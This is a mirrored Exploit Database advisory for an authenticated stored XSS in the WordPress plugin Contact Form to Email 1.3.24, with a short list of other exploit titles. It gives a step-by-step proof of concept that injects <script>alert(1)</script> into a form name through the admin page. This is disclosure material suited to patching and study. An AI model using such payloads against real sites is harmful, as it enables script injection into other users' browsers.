WordPress Plugin Contact Form to Email 1.3.24 – Stored Cross Site Scripting (XSS) (Authenticated)

Exploit Database
81 阅读

作者： Mohammed Aadhil Ashfaq

日期： 2021-11-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50524/

# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 11/11/2021
# Exploit Author: Mohammed Aadhil Ashfaq
# Vendor Homepage: https://form2email.dwbooster.com/
# Version: 1.3.24
# Tested on: wordpress

POC
1. Click Contact form to Email
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
2. Create new form name with <script>alert(1)</script>
3. Click Publish
4. XSS has been triggered
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
5. Open a different browser, logged in with wordpress. Copy the URL and
Press enter. XSS will trigger.

last Exploits
WordPress Plugin Contact Form to Email 1.3.24 – Stored Cross Site Scripting (XSS) (Authenticated)的更多信息

PRO-7070 Hazır Profesyonel Web Sitesi 1.0 – Authentication Bypass：
RealtyScript 4.0.2 – Multiple Blind SQL Injections：
AstroCMS – Multiple Vulnerabilities：
Opsview pre 4.4.1 – Blind SQL Injection：
TimeClock Software 1.01 0 – (Authenticated) Time-Based SQL Injection：
BOOKSolved 1.2.2 – Remote File Disclosure：
Cart Software – Multiple Vulnerabilities：
Joomla! Component Amblog 1.0 – Multiple SQL Injections：